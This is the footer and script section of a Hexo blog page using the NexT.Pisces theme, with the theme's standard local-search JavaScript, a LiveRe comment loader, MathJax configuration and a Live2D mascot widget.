        <div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">zhe</span>

  
</div>
<!--

  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>

-->



        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  




  
  









  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/three/three.min.js"></script>
  

  
  
    <script type="text/javascript" src="/lib/three/three-waves.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  
    <script type="text/javascript">
      (function(d, s) {
        var j, e = d.getElementsByTagName(s)[0];
        if (typeof LivereTower === 'function') { return; }
        j = d.createElement(s);
        j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
        j.async = true;
        e.parentNode.insertBefore(j, e);
      })(document, 'script');
    </script>
  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  
  
    <script type="text/x-mathjax-config">
      MathJax.Hub.Config({
        tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
        }
      });
    </script>

    <script type="text/x-mathjax-config">
      MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for (i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
        }
      });
    </script>
    <script type="text/javascript" src="//cdn.bootcss.com/mathjax/2.7.1/latest.js?config=TeX-AMS-MML_HTMLorMML"></script>
  


  

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/hijiki.model.json"},"display":{"position":"right","width":180,"height":360},"mobile":{"show":true},"log":false});</script></body>
</html>
